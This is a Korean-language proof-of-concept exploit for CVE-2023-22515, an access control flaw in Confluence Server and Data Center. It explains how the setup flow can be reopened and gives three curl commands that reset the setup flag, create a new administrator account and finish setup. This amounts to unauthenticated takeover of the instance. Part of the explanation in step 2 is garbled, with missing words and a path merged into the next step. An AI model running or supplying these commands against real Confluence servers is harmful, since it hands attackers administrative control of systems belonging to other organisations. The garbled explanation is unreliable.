
Confluence Server 및 Data Center의 심각한 손상된 접근 제어 취약점인 CVE-2023-22515에 대한 개념 증명 익스플로잇으로, 인증되지 않은 관리자 탈취를 가능하게 합니다.
CVE-2023-22515는 온프레미스 인스턴스의 Confluence Server 및 Confluence Data Center에 영향을 미치는 심각한 취약점으로, 끊어진 접근 제어(Broken Access Control) 취약점입니다. Atlassian은 CVSS 기본 점수 10.0을 부여했습니다.
1- Xwork 인터셉터가 파라미터를 구문 분석하는 방식으로 인해 /test.action?one=a는 setOne()='a'와 같고, /test.action?one.two=a는 getOne().setTwo()="a"와 같습니다.
2- /setup/* 엔드포인트에는 @ParameterSafe 호출이 포함되어 있어 /setup/setupdb.action?dbConfigInfo.databaseType=postgresql과 같이 set 및 을 사용할 수 있습니다. 그러나 설정이 완료되어 엔드포인트가 차단되므로 을 사용할 수 있습니다.
get/setup/*/server-info.action3- 완전한 설정을 위한 set 메서드를 찾습니다 => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- "X-Atlassian-Token" 헤더를 사용하여 XSRF를 우회합니다.
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
면책 조항: 이 익스플로잇은 본인이 발견하거나 제작한 것이 아니며, 아래 문서들의 공로를 인정합니다.